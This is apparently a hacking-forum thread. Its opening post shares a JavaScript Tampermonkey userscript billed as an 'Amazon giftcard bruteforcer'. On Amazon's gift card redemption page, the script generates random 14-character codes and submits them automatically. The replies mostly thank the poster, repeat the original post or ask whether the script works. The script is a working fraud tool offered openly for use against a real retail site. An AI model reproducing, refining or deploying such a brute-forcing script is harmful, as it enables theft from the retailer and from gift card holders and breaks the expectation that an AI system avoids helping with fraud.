Sign in to follow this  
awwwyeah

AMAZON GIFTCARD BRUTEFORCER SCRIPT

Recommended Posts

whipped up a js script auto reload for amazon gc checking. simple but works. idk if anyone has made posts of these but this is basically a single thread browser checker.

run with tampermonkey

first contribution with js skIllzZ :hype:

 

[hide]

// ==UserScript==
// @name         New Userscript
// @namespace    http://tampermonkey.net/
// @version      0.1
// @description  try to take over the world!
// @author       You
// @match        https://www.amazon.com.au/gc/redeem/result
// @grant        none
// ==/UserScript==

(function() {

   function buildGC() {
       var text = "";
       var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";

       for (var i = 0; i < 14; i++) {
           text += possible.charAt(Math.floor(Math.random() * possible.length));
       }
       return text;
   }

   window.onload = function () {
       document.getElementById("gc-redemption-input").value = buildGC();
       document.getElementById("gc-redemption-apply-button").click();
   }

})();

[/hide]

Share this post


Link to post
Share on other sites

Your thread has been approved

Share this post


Link to post
Share on other sites

you got like thanks so much

Share this post


Link to post
Share on other sites

i test it 24/7 i will hope

Share this post


Link to post
Share on other sites

whipped up a js script auto reload for amazon gc checking. simple but works. idk if anyone has made posts of these but this is basically a single thread browser checker.

run with tampermonkey

first contribution with js skIllzZ :hype:

 

will

 

will try it out thanks bro!

Share this post


Link to post
Share on other sites

yes my g do you wanna be me do you wanna see me

Share this post


Link to post
Share on other sites

whipped up a js script auto reload for amazon gc checking. simple but works. idk if anyone has made posts of these but this is basically a single thread browser checker.

run with tampermonkey

first contribution with js skIllzZ :hype:

 

 

 

thanks brooooo :fiesta: :fiesta: :fiesta:

Share this post


Link to post
Share on other sites

I am not sure what the problem is that the information you provide me with the latest version

Share this post


Link to post
Share on other sites

whipped up a js script auto reload for amazon gc checking. simple but works. idk if anyone has made posts of these but this is basically a single thread browser checker.

run with tampermonkey

first contribution with js skIllzZ :hype:

 

 

 

This could be very helpful, thanks!

Share this post


Link to post
Share on other sites

whipped up a js script auto reload for amazon gc checking. simple but works. idk if anyone has made posts of these but this is basically a single thread browser checker.

run with tampermonkey

first contribution with js skIllzZ :hype:

 

 

 

does it work?

Share this post


Link to post
Share on other sites

goood mannnnn

Share this post


Link to post
Share on other sites

i smell bullshit, but ill try this

Share this post


Link to post
Share on other sites

thanks mate hope its working

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this